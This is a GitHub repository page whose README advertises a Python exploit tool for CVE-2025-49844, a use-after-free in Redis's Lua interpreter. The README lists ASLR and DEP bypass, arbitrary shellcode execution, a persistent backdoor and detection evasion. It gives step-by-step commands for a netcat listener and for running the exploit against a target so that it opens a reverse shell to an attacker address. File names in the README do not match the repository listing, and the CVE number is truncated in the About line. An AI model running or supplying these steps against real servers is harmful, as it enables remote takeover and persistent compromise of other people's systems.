Skip to content

Yuri08loveElaina/CVE-2025-49844

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
redis_exploit.py
redis_exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2025-49844 - Redis Lua Interpreter UAF Exploit

yuri08loveelaina Version License

Features

  • Exploit Use-After-Free (UAF) vulnerability in Redis Lua interpreter
  • Bypass ASLR via memory information leakage
  • Bypass DEP/NX using Return-Oriented Programming (ROP)
  • Heap spraying for reliable exploitation
  • Execute arbitrary shellcode on target systems
  • Establish persistent backdoor access
  • Multi-stage exploitation with memory manipulation

Requirements

  • Python 3.6+
  • Redis server with vulnerable version
  • Required Python packages:
pip install redis

Installation

git clone https://github.com/Yuri08loveElaina/CVE-2025-49844.git
cd CVE-2025-49844
pip install -r requirements.txt
chmod +x redis-exploit.py
  • Usage Basic Vulnerability Check
python3 exploit.py -H <target_host> -p <port> [-a <password>]

Reverse Shell Establishment

First, start a listener on your machine

nc -lvnp 4444

Then, run the exploit with reverse shell parameters

python3 exploit.py -H <target_host> -p <port> [-a <password>] -l <your_ip> -P <your_port>
Options
-H, --host: Target Redis host (default: localhost)
-p, --port: Target Redis port (default: 6379)
-a, --auth: Redis password (if required)
-l, --lhost: Your IP address for reverse shell connection
-P, --lport: Your port for reverse shell connection (default: 4444)

Examples

Basic exploitation

python3 exploit.py -H 192.168.1.100

With authentication

python3 exploit.py -H 192.168.1.100 -p 6380 -a mypassword

With reverse shell

python3 exploit.py -H 192.168.1.100 -l 10.10.15.5 -P 4444

Exploit Stages

  • Connection & Version Check: Establish connection to target and verify vulnerability
  • Architecture Detection: Determine target architecture (x86/x64)
  • Heap Preparation: Spray heap to increase exploit reliability
  • UAF Object Creation: Create objects for Use-After-Free exploitation
  • Memory Leakage: Leak memory addresses to bypass ASLR
  • ROP Chain Construction: Build ROP chain to bypass DEP/NX
  • Shellcode Execution: Execute arbitrary shellcode on target
  • Persistence: Establish persistent backdoor if requested

Vulnerable Versions

Redis 7.2.x before 7.2.11 Redis 7.4.x before 7.4.6 Redis 8.0.x before 8.0.4 Redis 8.2.x before 8.2.2

Detection

The exploit attempts to minimize detection, but possible indicators include:

  • Unusual Lua script execution patterns with large payloads
  • Anomalous memory allocation behavior in Redis process
  • Unexpected process creation from Redis parent process
  • Network connections from Redis process to external hosts Disclaimer This tool is for educational and authorized security testing purposes only. The authors are not responsible for any misuse or damage caused by this tool. Use only on systems you own or have explicit permission to test.

License This project is licensed under the MIT License - see the LICENSE file for details.

About

A powerful Redis exploitation tool that leverages CVE-2025-4984

Topics

pentest red-team use-after-free cve-2025 yuri08 yuri08loveelaina elaina-cute cve-2025-49844 cve-2025-49844-poc redis-exploitation

Resources

Readme

License

MIT license
Activity

Stars

66 stars

Watchers

2 watching

Forks

12 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 1

Languages